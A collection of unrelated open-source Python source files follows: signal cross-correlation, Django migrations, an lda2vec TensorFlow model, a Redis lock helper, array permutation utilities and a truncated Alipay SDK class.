stingray/crosscorrelation.py | pierfra-ro/stingray | 133 | 12687343 | <gh_stars>100-1000
import warnings
import numpy as np
from scipy import signal
try:
from pyfftw.interfaces.scipy_fft import ifft, fftfreq
except ImportError:
warnings.warn("pyfftw not installed. Using standard scipy fft")
from scipy.fft import ifft, fftfreq
from stingray.lightcurve import Lightcurve
from stingray.crossspectrum import Crossspectrum, AveragedCrossspectrum
from stingray.exceptions import StingrayError
import stingray.utils as utils
__all__ = ['CrossCorrelation', 'AutoCorrelation']
class CrossCorrelation(object):
"""Make a cross-correlation from light curves or a cross spectrum.
You can also make an empty :class:`Crosscorrelation` object to populate
with your own cross-correlation data.
Parameters
----------
lc1: :class:`stingray.Lightcurve` object, optional, default ``None``
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum` object, default ``None``
The cross spectrum data for the correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]_
for more details.
Attributes
----------
lc1: :class:`stingray.Lightcurve`
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve`
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum`
The cross spectrum data for the correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from two light curves
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each light curve (used in ``time_lag`` calculations)
time_shift: float
Time lag that gives maximum value of correlation between two light curves.
There will be maximum correlation between light curves if one of the light curve
is shifted by ``time_shift``.
n: int
Number of points in ``self.corr`` (length of cross-correlation data)
auto: bool
An internal flag to indicate whether this is a cross-correlation or an auto-correlation.
References
----------
.. [scipy-docs] https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.correlate.html
"""
def __init__(self, lc1=None, lc2=None, cross=None, mode='same'):
self.auto = False
if isinstance(mode, str) is False:
raise TypeError("mode must be a string")
if mode.lower() not in ["full", "valid", "same"]:
raise ValueError("mode must be 'full', 'valid' or 'same'!")
self.mode = mode.lower()
self.lc1 = None
self.lc2 = None
self.cross = None
# Populate all attributes by ``None` if user passes no lightcurve data
if lc1 is None or lc2 is None:
if lc1 is not None or lc2 is not None:
raise TypeError("You can't do a cross correlation with just one "
"light curve!")
else:
if cross is None:
# all object input params are ``None``
self.corr = None
self.time_shift = None
self.time_lags = None
self.dt = None
self.n = None
else:
self._make_cross_corr(cross)
return
else:
self._make_corr(lc1, lc2)
def _make_cross_corr(self, cross):
"""
Do some checks on the cross spectrum supplied to the method,
and then calculate the time shifts, time lags and cross correlation.
Parameters
----------
cross: :class:`stingray.Crossspectrum` object
The crossspectrum, averaged or not.
"""
if not isinstance(cross, Crossspectrum):
if not isinstance(cross, AveragedCrossspectrum):
raise TypeError("cross must be a crossspectrum.Crossspectrum \
or crossspectrum.AveragedCrossspectrum object")
if self.cross is None:
self.cross = cross
self.dt = 1/(cross.df * cross.n)
if self.dt is None:
self.dt = 1/(cross.df * cross.n)
prelim_corr = abs(ifft(cross.power).real) # keep only the real
self.n = len(prelim_corr)
# ifft spits out an array that looks like [0,1,...n,-n,...-1]
# where n is the last positive frequency
# correcting for this by putting them in order
times = fftfreq(self.n, cross.df)
time, corr = np.array(sorted(zip(times, prelim_corr))).T
self.corr = corr
self.time_shift, self.time_lags, self.n = self.cal_timeshift(dt=self.dt)
def _make_corr(self, lc1, lc2):
"""
Do some checks on the light curves supplied to the method, and then calculate the time
shifts, time lags and cross correlation.
Parameters
----------
lc1::class:`stingray.Lightcurve` object
The first light curve data.
lc2::class:`stingray.Lightcurve` object
The second light curve data.
"""
if not isinstance(lc1, Lightcurve):
raise TypeError("lc1 must be a lightcurve.Lightcurve object")
if not isinstance(lc2, Lightcurve):
raise TypeError("lc2 must be a lightcurve.Lightcurve object")
if not np.isclose(lc1.dt, lc2.dt):
raise StingrayError("Light curves do not have "
"same time binning dt.")
else:
# ignore very small differences in dt neglected by np.isclose()
lc1.dt = lc2.dt
self.dt = lc1.dt
# self.lc1 and self.lc2 may get assigned values explicitly in which case there is no need to copy data
if self.lc1 is None:
self.lc1 = lc1
if self.lc2 is None:
self.lc2 = lc2
# Subtract means before passing scipy.signal.correlate into correlation
lc1_counts = self.lc1.counts - np.mean(self.lc1.counts)
lc2_counts = self.lc2.counts - np.mean(self.lc2.counts)
# Calculates cross-correlation of two lightcurves
self.corr = signal.correlate(lc1_counts, lc2_counts, self.mode)
self.n = len(self.corr)
self.time_shift, self.time_lags, self.n = self.cal_timeshift(dt=self.dt)
def cal_timeshift(self, dt=1.0):
"""
Calculate the cross correlation against all possible time lags, both positive and negative.
Parameters
----------
dt: float, optional, default ``1.0``
Time resolution of the light curve, should be passed when object is populated with
correlation data and no information about light curve can be extracted. Used to
calculate ``time_lags``.
Returns
-------
self.time_shift: float
Value of the time lag that gives maximum value of correlation between two light curves.
self.time_lags: numpy.ndarray
An array of ``time_lags`` calculated from correlation data
"""
if self.dt is None:
self.dt = dt
if self.corr is None:
if (self.lc1 is None or self.lc2 is None) and (self.cross is None):
raise StingrayError('Please provide either two lightcurve objects or \
a [average]crossspectrum object to calculate correlation and time_shift')
else:
# This will cover very rare case of assigning self.lc1 and lc2
# or self.cross and also self.corr = ``None``.
# In this case, correlation is calculated using self.lc1
# and self.lc2 and using that correlation data,
# time_shift is calculated.
if self.cross is not None:
self._make_cross_corr(self.cross)
else:
self._make_corr(self.lc1, self.lc2)
self.n = len(self.corr)
dur = int(self.n / 2)
# Correlation against all possible lags, positive as well as negative lags are stored
x_lags = np.linspace(-dur, dur, self.n)
self.time_lags = x_lags * self.dt
# time_shift is the time lag for max. correlation
self.time_shift = self.time_lags[np.argmax(self.corr)]
return self.time_shift, self.time_lags, self.n
def plot(self, labels=None, axis=None, title=None, marker='-', save=False, filename=None, ax=None):
"""
Plot the :class:`Crosscorrelation` as function using Matplotlib.
Plot the Crosscorrelation object on a graph ``self.time_lags`` on x-axis and
``self.corr`` on y-axis
Parameters
----------
labels : iterable, default ``None``
A list of tuple with ``xlabel`` and ``ylabel`` as strings.
axis : list, tuple, string, default ``None``
Parameter to set axis properties of ``matplotlib`` figure. For example
it can be a list like ``[xmin, xmax, ymin, ymax]`` or any other
acceptable argument for ``matplotlib.pyplot.axis()`` function.
title : str, default ``None``
The title of the plot.
marker : str, default ``-``
Line style and color of the plot. Line styles and colors are
combined in a single format string, as in ``'bo'`` for blue
circles. See ``matplotlib.pyplot.plot`` for more options.
save : boolean, optional (default=False)
If True, save the figure with specified filename.
filename : str
File name of the image to save. Depends on the boolean ``save``.
ax : ``matplotlib.Axes`` object
An axes object to fill with the cross correlation plot.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError("Matplotlib required for plot()")
if ax is None:
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
ax.plot(self.time_lags, self.corr, marker)
if labels is not None:
try:
ax.set_xlabel(labels[0])
ax.set_ylabel(labels[1])
except TypeError:
utils.simon("``labels`` must be either a list or tuple with "
"x and y labels.")
raise
except IndexError:
utils.simon("``labels`` must have two labels for x and y "
"axes.")
# Not raising here because in case of len(labels)==1, only
# x-axis will be labelled.
# axis is a tuple containing formatting information
if axis is not None:
ax.axis(axis)
if title is not None:
ax.set_title(title)
if save:
if filename is None:
plt.savefig('corr.pdf', format="pdf")
else:
plt.savefig(filename)
else:
plt.show(block=False)
return ax
class AutoCorrelation(CrossCorrelation):
"""
Make an auto-correlation from a light curve.
You can also make an empty Autocorrelation object to populate with your
own auto-correlation data.
Parameters
----------
lc: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]
for more details.
Attributes
----------
lc1, lc2::class:`stingray.Lightcurve`
The light curve data for correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from lightcurve data
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each lightcurve (used in time_lag calculations)
time_shift: float, zero
Max. Value of AutoCorrelation is always at zero lag.
n: int
Number of points in self.corr(Length of auto-correlation data)
"""
def __init__(self, lc=None, mode='same'):
CrossCorrelation.__init__(self, lc1=lc, lc2=lc, mode=mode)
self.auto = True
|
src/pretix/base/migrations/0084_questionoption_position.py | pajowu/pretix | 1,248 | 12687347 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-03 16:41
from __future__ import unicode_literals
from django.db import migrations, models
def set_position(apps, schema_editor):
Question = apps.get_model('pretixbase', 'Question')
for q in Question.objects.all():
for i, option in enumerate(q.options.all()):
option.position = i
option.save()
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0083_auto_20180228_2102'),
]
operations = [
migrations.AlterModelOptions(
name='questionoption',
options={'ordering': ('position', 'id'), 'verbose_name': 'Question option', 'verbose_name_plural': 'Question options'},
),
migrations.AddField(
model_name='questionoption',
name='position',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='question',
name='position',
field=models.PositiveIntegerField(default=0, verbose_name='Position'),
),
migrations.RunPython(
set_position,
reverse_code=migrations.RunPython.noop,
),
]
|
lda2vec/Lda2vec.py | MatrixBlake/Lda2vec-Tensorflow | 119 | 12687354 | <filename>lda2vec/Lda2vec.py
import tensorflow as tf
import numpy as np
import lda2vec.word_embedding as W
import lda2vec.embedding_mixture as M
import lda2vec.dirichlet_likelihood as DL
from lda2vec import utils
from datetime import datetime
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
class Lda2vec:
RESTORE_KEY = 'to_restore'
def __init__(self, num_unique_documents, vocab_size, num_topics, freqs=None,
save_graph_def=True, embedding_size=128, num_sampled=40,
learning_rate=0.001, lmbda=200.0, alpha=None, power=0.75, batch_size=500, logdir='logdir',
restore=False, fixed_words=False, factors_in=None, pretrained_embeddings=None):
"""Summary
Args:
num_unique_documents (int): Number of unique documents in your dataset
vocab_size (int): Number of unique words/tokens in your dataset
num_topics (int): The set number of topics to cluster your data into
freqs (list, optional): Python list of length vocab_size with frequencies of each token
save_graph_def (bool, optional): If true, we will save the graph to logdir
embedding_size (int, optional): Dimension of the embeddings. This will be shared between docs, words, and topics.
num_sampled (int, optional): Negative sampling number for NCE Loss.
learning_rate (float, optional): Learning rate for optimizer
lmbda (float, optional): Strength of dirichlet prior
alpha (None, optional): alpha of dirichlet process (defaults to 1/n_topics)
power (float, optional): unigram sampler distortion
batch_size (int, optional): Batch size coming into model
logdir (str, optional): Location for models to be saved - note, we will append on the datetime too on each run
restore (bool, optional): When True, we will restore the model from the logdir parameter's location
fixed_words (bool, optional): Description
factors_in (None, optional): Pretrained Topic Embedding (shape should be [num_topics, embedding_size])
pretrained_embeddings (None, optional): Description
"""
self.config = tf.ConfigProto()
self.config.gpu_options.allow_growth = True
self.sesh = tf.Session(config=self.config)
self.moving_avgs = tf.train.ExponentialMovingAverage(0.9)
self.num_unique_documents = num_unique_documents
self.vocab_size = vocab_size
self.num_topics = num_topics
self.freqs = freqs
self.save_graph_def = save_graph_def
self.logdir = logdir
self.embedding_size = embedding_size
self.num_sampled = num_sampled
self.learning_rate = learning_rate
self.lmbda = lmbda
self.alpha = alpha
self.power = power
self.batch_size = batch_size
self.pretrained_embeddings = pretrained_embeddings
self.factors_in = factors_in
self.compute_normed = False
self.fixed_words = fixed_words
if not restore:
self.date = datetime.now().strftime('%y%m%d_%H%M')
self.logdir = ('{}_{}').format(self.logdir, self.date)
# Load pretrained embeddings if provided.
if isinstance(pretrained_embeddings, np.ndarray):
W_in = tf.constant(pretrained_embeddings, name="word_embedding") if fixed_words else tf.get_variable("word_embedding", shape=[self.vocab_size,self.embedding_size], initializer=tf.constant_initializer(pretrained_embeddings))
else:
W_in = None
# Initialize the word embedding
self.w_embed = W.Word_Embedding(self.embedding_size, self.vocab_size, self.num_sampled,
W_in=W_in, freqs=self.freqs,
power=self.power)
# Initialize the Topic-Document Mixture
self.mixture = M.EmbedMixture(self.num_unique_documents, self.num_topics, self.embedding_size)
# Builds the graph and returns variables within it
handles = self._build_graph()
for handle in handles:
tf.add_to_collection(Lda2vec.RESTORE_KEY, handle)
# Add Word Embedding Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.embedding)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.nce_weights)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.nce_biases)
# Add Doc Mixture Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.mixture.doc_embedding)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.mixture.topic_embedding)
(self.x, self.y, self.docs, self.step, self.switch_loss,
self.word_context, self.doc_context, self.loss_word2vec,
self.fraction, self.loss_lda, self.loss, self.loss_avgs_op,
self.optimizer, self.merged) = handles
else:
meta_graph = logdir + '/model.ckpt'
tf.train.import_meta_graph(meta_graph + '.meta').restore(self.sesh, meta_graph)
handles = self.sesh.graph.get_collection(Lda2vec.RESTORE_KEY)
(self.x, self.y, self.docs, self.step, self.switch_loss,
self.word_context, self.doc_context, self.loss_word2vec,
self.fraction, self.loss_lda, self.loss, self.loss_avgs_op,
self.optimizer, self.merged, embedding, nce_weights, nce_biases,
doc_embedding, topic_embedding) = handles
self.w_embed = W.Word_Embedding(self.embedding_size, self.vocab_size, self.num_sampled,
W_in=embedding, freqs=self.freqs,
power=self.power,
nce_w_in=nce_weights,
nce_b_in=nce_biases)
# Initialize the Topic-Document Mixture
self.mixture = M.EmbedMixture(self.num_unique_documents,
self.num_topics,
self.embedding_size,
W_in=doc_embedding,
factors_in=topic_embedding)
def prior(self):
"""Computes Dirichlet Prior.
Returns:
TYPE: Dirichlet Prior Value
"""
doc_prior = DL.dirichlet_likelihood(self.mixture.doc_embedding, alpha=self.alpha)
return doc_prior
def _build_graph(self):
"""Builds the Lda2vec model graph.
"""
# Model Inputs
# Pivot Words
x = tf.placeholder(tf.int32, shape=[None], name='x_pivot_idxs')
# Context/Target Words
y = tf.placeholder(tf.int64, shape=[None], name='y_target_idxs')
# Document ID
docs = tf.placeholder(tf.int32, shape=[None], name='doc_ids')
# Global Step
step = tf.Variable(0, trainable=False, name='global_step')
# What epoch should we switch on lda loss?
switch_loss = tf.Variable(0, trainable=False)
# Word embedding lookup
word_context = tf.nn.embedding_lookup(self.w_embed.embedding, x, name='word_embed_lookup')
# Document Context via document ID lookup
doc_context = self.mixture(doc_ids=docs)
# Compile word + doc context in list and add them together
contexts_to_add=[word_context, doc_context]
context = tf.add_n(contexts_to_add, name='context_vector')
# Compute Word2Vec Loss
with tf.name_scope('nce_loss'):
loss_word2vec = self.w_embed(context, y)
tf.summary.scalar('nce_loss', loss_word2vec)
# Compute LDA Loss
with tf.name_scope('lda_loss'):
fraction = tf.Variable(1, trainable=False, dtype=tf.float32, name='fraction')
loss_lda = self.lmbda * fraction * self.prior()
tf.summary.scalar('lda_loss', loss_lda)
# Determine if we should be using only word2vec loss or if we should add in LDA loss based on switch_loss Variable
loss = tf.cond(step < switch_loss, lambda: loss_word2vec, lambda: loss_word2vec + loss_lda)
# Add current loss to moving average of loss
loss_avgs_op = self.moving_avgs.apply([loss_lda, loss_word2vec, loss])
# Init the optimizer
with tf.control_dependencies([loss_avgs_op]):
optimizer = tf.contrib.layers.optimize_loss(loss,
tf.train.get_global_step(),
self.learning_rate,
'Adam',
name='Optimizer')
# Initialize all variables
self.sesh.run(tf.global_variables_initializer(), options=tf.RunOptions(report_tensor_allocations_upon_oom=True))
# Create a merged summary of variables
merged = tf.summary.merge_all()
to_return = [x, y, docs, step, switch_loss, word_context, doc_context,
loss_word2vec, fraction, loss_lda, loss, loss_avgs_op, optimizer, merged]
return to_return
def train(self, pivot_words, target_words, doc_ids, data_size, num_epochs, switch_loss_epoch=0,
save_every=1, report_every=1, print_topics_every=5, idx_to_word=None):
"""Train the Lda2vec Model. pivot_words, target_words, and doc_ids should be
the same size.
Args:
pivot_words (np.array): Array of word idxs corresponding to pivot words
target_words (np.array): Array of word idxs corresponding to target words
doc_ids (TYPE): Document IDs linking word idxs to their docs
data_size (TYPE): Length of pivot_words array
num_epochs (TYPE): Number of epochs to train model
switch_loss_epoch (int, optional): Epoch to switch on LDA loss. LDA loss not learned
until this epoch
save_every (int, optional): Save model every "save_every" epoch
report_every (int, optional): Report model metrics every "report_every" epoch.
print_topics_every (int, optional): Print top 10 words in each topic every "print_topics_every"
idx_to_word (None, optional): IDX to word mapping - Required if you want to see word-topic membership
"""
# Calculate fraction used in DL Loss calculation
temp_fraction = self.batch_size * 1.0 / data_size
# Assign the fraction placeholder variable with the value we calculated
self.sesh.run(tf.assign(self.fraction, temp_fraction))
# Calculate the number of iterations per epoch so we can figure out when to switch the loss
iters_per_epoch = int(data_size / self.batch_size) + np.ceil(data_size % self.batch_size)
# Calculate what step we would be on @ the switch loss epoch
switch_loss_step = iters_per_epoch * switch_loss_epoch
# Assign the switch loss variable with the step we just calculated
self.sesh.run(tf.assign(self.switch_loss, switch_loss_step))
if self.save_graph_def:
# Initialize a tensorflow Saver object
saver = tf.train.Saver()
# Initialize a tensorflow summary writer so we can save logs
writer = tf.summary.FileWriter(self.logdir + '/', graph=self.sesh.graph)
# Iterate over the number of epochs we want to train for
for e in range(num_epochs):
print('\nEPOCH:', e + 1)
# Get a batch worth of data
for p, t, d in utils.chunks(self.batch_size, pivot_words, target_words, doc_ids):
# Create the feed dict from the batched data
feed_dict = {self.x: p, self.y: t, self.docs: d}
# Values we want to fetch whenever we run the model
fetches = [self.merged, self.optimizer, self.loss,
self.loss_word2vec, self.loss_lda, self.step]
# Run a step of the model
summary, _, l, lw2v, llda, step = self.sesh.run(fetches, feed_dict=feed_dict)
# Prints log every "report_every" epoch
if (e+1) % report_every == 0:
print('LOSS', l, 'w2v', lw2v, 'lda', llda)
# Saves model every "save_every" epoch
if (e+1) % save_every == 0 and self.save_graph_def:
writer.add_summary(summary, step)
writer.flush()
writer.close()
save_path = saver.save(self.sesh, self.logdir + '/model.ckpt')
writer = tf.summary.FileWriter(self.logdir + '/', graph=self.sesh.graph)
# Prints out membership of words in each topic every "print_topics_every" epoch
if e>0 and (e+1)%print_topics_every==0:
idxs = np.arange(self.num_topics)
words, sims = self.get_k_closest(idxs, in_type='topic', idx_to_word=idx_to_word, k=10, verbose=True)
# Save after all epochs are finished, but only if we didn't just save
if self.save_graph_def and (e+1) % save_every != 0:
writer.add_summary(summary, step)
writer.flush()
writer.close()
save_path = saver.save(self.sesh, self.logdir + '/model.ckpt')
def compute_normed_embeds(self):
"""Normalizes embeddings so we can measure cosine similarity
between different embedding matrixes.
"""
self.normed_embed_dict = {}
norm = tf.sqrt(tf.reduce_sum(self.mixture.topic_embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['topic'] = self.mixture.topic_embedding / norm
norm = tf.sqrt(tf.reduce_sum(self.w_embed.embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['word'] = self.w_embed.embedding / norm
norm = tf.sqrt(tf.reduce_sum(self.mixture.doc_embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['doc'] = self.mixture.doc_embedding / norm
self.idxs_in = tf.placeholder(tf.int32, shape=[None], name='idxs')
self.compute_normed = True
def get_k_closest(self, idxs, in_type='word', vs_type='word', k=10, idx_to_word=None, verbose=False):
"""Gets k closest vs_type embeddings for every idx of in_type embedding given.
Options for the in_type and vs_type are ["word", "topic", "doc"].
Args:
idxs (np.array): Array of indexes you want to get similarities to
in_type (str, optional): idxs will query this embedding matrix
vs_type (str, optional): embeddings to compare to in_type embedding lookup
k (int, optional): Number of vs_type embeddings to return per idx
idx_to_word (dict, optional): IDX to word mapping
verbose (bool, optional): Should we print out the top k words per epoch? False by default.
Only prints if idx_to_word is passed too.
Returns:
sim: Actual embeddings that are similar to each idx. shape [idxs.shape[0], k, self.embed_size]
sim_idxs: Indexes of the sim embeddings. shape [idxs.shape[0], k]
NOTE: Acceptable pairs include:
word - word
word - topic
topic - word
doc - doc
"""
if self.compute_normed == False:
self.compute_normed_embeds()
self.batch_array = tf.nn.embedding_lookup(self.normed_embed_dict[in_type], self.idxs_in)
self.cosine_similarity = tf.matmul(self.batch_array, tf.transpose(self.normed_embed_dict[vs_type], [1, 0]))
feed_dict = {self.idxs_in: idxs}
sim, sim_idxs = self.sesh.run(tf.nn.top_k(self.cosine_similarity, k=k), feed_dict=feed_dict)
if idx_to_word:
if verbose and vs_type=="word":
print('---------Closest {} words to given indexes----------'.format(k))
for i, idx in enumerate(idxs):
if in_type == 'word':
in_word = idx_to_word[idx]
else:
in_word = 'Topic ' + str(idx)
vs_word_list = []
for vs_i in range(sim_idxs[i].shape[0]):
vs_idx = sim_idxs[i][vs_i]
vs_word = idx_to_word[vs_idx]
vs_word_list.append(vs_word)
if verbose and vs_type=="word":
print(in_word, ':', (', ').join(vs_word_list))
return (sim, sim_idxs)
def save_weights_to_file(self, word_embed_path='word_weights', doc_embed_path='doc_weights',
topic_embed_path='topic_weights'):
"""Saves embedding matrixes to file.
Args:
word_embed_path (str, optional): Path and name where you want to save word embeddings
doc_embed_path (str, optional): Path and name where you want to save doc embeddings
topic_embed_path (str, optional): Path and name where you want to save topic embeddings
"""
word_embeds = self.sesh.run(self.word_embedding)
np.save(word_embed_path, word_embeds)
doc_embeds = self.sesh.run(self.doc_embedding)
np.save(doc_embed_path, doc_embeds)
topic_embeds = self.sesh.run(self.topic_embedding)
np.save(topic_embed_path, topic_embeds) |
tests/test_core.py | basnijholt/HASS-data-detective | 128 | 12687446 | from unittest.mock import patch
from detective.core import get_db_type, stripped_db_url
def test_get_db_type():
assert get_db_type("mysql://localhost") == "mysql"
assert get_db_type("mysql+pymysql://localhost") == "mysql"
def test_stripped_db_url():
assert stripped_db_url("mysql://localhost") == "mysql://localhost"
assert stripped_db_url("mysql://paulus@localhost") == "mysql://paulus@localhost"
assert (
stripped_db_url("mysql://paulus:password@localhost")
== "mysql://paulus:***@localhost"
)
def test_fetch_entities(mock_db):
with patch.object(
mock_db,
"perform_query",
return_value=[["light.kitchen"], ["light.living_room"], ["switch.ac"],],
):
mock_db.fetch_entities()
assert mock_db.entities == ["light.kitchen", "light.living_room", "switch.ac"]
|
utils/utils.py | BaoLocPham/hum2song | 108 | 12687481 | <filename>utils/utils.py<gh_stars>100-1000
import torch
import numpy as np
from torchvision import transforms as T
from sklearn.preprocessing import normalize
import os
def load_image(npy_path, input_shape=(630, 80)):
data = np.load(npy_path)
if data.shape[0] >= input_shape[0]:
result = data[:input_shape[0], :]
else:
result = np.zeros(input_shape)
result[:data.shape[0], :data.shape[1]] = data
image = torch.from_numpy(result).unsqueeze(0).unsqueeze(0)
return image.float()
def get_feature(model, image):
data = image.to(torch.device("cuda"))
with torch.no_grad():
output = model(data)
output = output.cpu().detach().numpy()
output = normalize(output).flatten()
return np.matrix(output)
def writeFile(fileName, content):
with open(fileName, 'a') as f1:
f1.write(content + os.linesep)
|
daily/shanbay.py | androiddevnotesforks/2021 | 246 | 12687491 | <gh_stars>100-1000
import pendulum
import requests
from .config import MY_SHANBAY_USER_NAME, SHANBAY_CALENDAR_API
def _get_shanbay_streak(end_date=pendulum.now("Asia/Shanghai"), streak=0):
start_date = end_date.start_of("month")
r = requests.get(
SHANBAY_CALENDAR_API.format(
user_name=MY_SHANBAY_USER_NAME,
start_date=start_date.to_date_string(),
end_date=end_date.to_date_string(),
)
)
if not r.ok:
raise Exception("Can not get days from shanbay API")
data = r.json()
logs = data["logs"]
if not logs:
return streak
periods = list(pendulum.period(start_date, end_date.subtract(days=1)))
periods.sort(reverse=True)
log_dates = [i["date"] for i in logs]
# if today id done
if end_date.to_date_string() in log_dates:
streak += 1
# for else if not break not else
for p in periods:
if p.to_date_string() not in log_dates:
break
streak += 1
else:
streak = _get_shanbay_streak(
start_date.subtract(months=1).end_of("month"), streak=streak
)
return streak
def get_shanbay_daily(*args):
"""
first get today status
"""
end_date = pendulum.now("Asia/Shanghai")
start_date = end_date.start_of("month")
r = requests.get(
SHANBAY_CALENDAR_API.format(
user_name=MY_SHANBAY_USER_NAME,
start_date=start_date.to_date_string(),
end_date=end_date.to_date_string(),
)
)
if not r.ok:
raise Exception("Can not get days from shanbay API")
data = r.json()
is_today_check = False
total_days = data.get("checkin_days_num", 0)
log_dates = [i["date"] for i in data["logs"]]
if end_date.to_date_string() in log_dates:
is_today_check = True
streak = _get_shanbay_streak()
return total_days, streak, is_today_check
|
chainer_chemistry/utils/permutation.py | pfnet/chainerchem | 184 | 12687501 | import numpy
def permute_node(node, permutation_index, axis=-1):
"""Permute index of `node` array
Args:
node (numpy.ndarray): the array whose `axis` to be permuted.
permutation_index (numpy.ndarray): 1d numpy array whose size should be
same as permutation axis of `node`.
axis (int): permutation axis.
Returns (numpy.ndarray): permutated `node` array.
"""
if node.shape[axis] != len(permutation_index):
raise ValueError(
'node.shape[{}] = {} and len(permutation_index) = {} do not match!'
.format(axis, node.shape[axis], len(permutation_index)))
out_node = numpy.take(node, permutation_index, axis=axis).copy()
return out_node
def permute_adj(adj, permutation_index, axis=None):
"""Permute index of adjacency matrix array
Args:
adj (numpy.ndarray): the array whose `axis` to be permuted.
It is considered as adjacency matrix.
permutation_index (numpy.ndarray): 1d numpy array whose size should be
same as permutation axis of `node`.
axis (list or tuple or None): list of 2d int, indicates the permutation
axis. When None is passed (default), it uses -1 and -2 as `axis`,
it means that last 2 axis are considered to be permuted.
Returns (numpy.ndarray): permutated `adj` array.
"""
if axis is not None:
if not isinstance(axis, (list, tuple)):
raise TypeError('axis must be list or tuple, got {}'
.format(type(axis)))
if len(axis) != 2:
raise ValueError('axis length must 2, got {}'.format(len(axis)))
else:
axis = [-1, -2] # default value is to use last 2 axis
num_node = len(permutation_index)
for ax in axis:
if adj.shape[ax] != len(permutation_index):
raise ValueError(
'adj.shape[{}] = {} and len(permutation_index) = {} do not '
'match!'.format(axis, adj.shape[axis], len(permutation_index)))
out_adj = numpy.zeros_like(adj)
ndim = adj.ndim
for i in range(num_node):
for j in range(num_node):
in_indices = [slice(None)] * ndim
out_indices = [slice(None)] * ndim
in_indices[axis[0]] = i
in_indices[axis[1]] = j
out_indices[axis[0]] = permutation_index[i]
out_indices[axis[1]] = permutation_index[j]
out_adj[tuple(in_indices)] = adj[tuple(out_indices)]
return out_adj
|
gcloud/utils/redis_lock.py | DomineCore/bk-sops | 881 | 12687518 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import time
from contextlib import contextmanager
from uuid import uuid4
from django.conf import settings
from redis.exceptions import LockError
MAX_RETRY = getattr(settings, "REDIS_LOCK_MAX_RETRY", None) or 500
@contextmanager
def redis_lock(redis_instance, key):
lock_key = "lock_{}".format(key)
lock_id = str(uuid4())
try:
lock_acquired = acquire_redis_lock(redis_instance, lock_key, lock_id)
err = (
None
if lock_acquired
else LockError(f"Unable to acquire redis lock in max tries, lock key: {lock_key}, lock_id: {lock_id}")
)
yield lock_acquired, err
finally:
release_redis_lock(redis_instance, lock_key, lock_id)
def acquire_redis_lock(redis_instance, lock_key, lock_id):
cnt = 1
while cnt < MAX_RETRY:
if redis_instance.set(lock_key, lock_id, ex=5, nx=True):
return True
cnt += 1
time.sleep(0.01)
return False
def release_redis_lock(redis_instance, lock_key, lock_id):
lock_value = redis_instance.get(lock_key)
# 兼容不同模式的redis
lock_value = lock_value.decode() if isinstance(lock_value, bytes) else lock_value
if lock_value == lock_id:
redis_instance.delete(lock_key)
|
tests/python/py3implicitnamespace/namespace/sibling/__init__.py | sammorley-short/sphinx-autoapi | 197 | 12687529 | def first_method():
"""First sibling package method."""
return 1
def second_method():
"""Second sibling package method."""
return 2
|
numba/testing/__main__.py | auderson/numba | 6,620 | 12687596 | import sys
from numba.testing import run_tests
sys.exit(0 if run_tests(sys.argv).wasSuccessful() else 1)
|
src/pretalx/submission/migrations/0045_extend_question_help_text_length.py | lili668668/pretalx | 418 | 12687597 | <reponame>lili668668/pretalx
# Generated by Django 3.0.3 on 2020-03-01 19:25
from django.db import migrations
import i18nfield.fields
class Migration(migrations.Migration):
dependencies = [
("submission", "0044_submission_anonymised_data"),
]
operations = [
migrations.AlterField(
model_name="question",
name="help_text",
field=i18nfield.fields.I18nCharField(blank=True, max_length=800, null=True),
),
]
|
alipay/aop/api/domain/LawsuitPersonRecord.py | snowxmas/alipay-sdk-python-all | 213 | 12687620 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.EpInfo import EpInfo
from alipay.aop.api.domain.EpInfo import EpInfo
from alipay.aop.api.domain.EpInfo import EpInfo
from alipay.aop.api.domain.EpInfo import EpInfo
class LawsuitPersonRecord(object):
def __init__(self):
self._bgt_list = None
self._cpws_list = None
self._sxgg_list = None
self._zxgg_list = None
@property
def bgt_list(self):
return self._bgt_list
@bgt_list.setter
def bgt_list(self, value):
if isinstance(value, list):
self._bgt_list = list()
for i in value:
if isinstance(i, EpInfo):
self._bgt_list.append(i)
else:
self._bgt_list.append(EpInfo.from_alipay_dict(i))
@property
def cpws_list(self):
return self._cpws_list
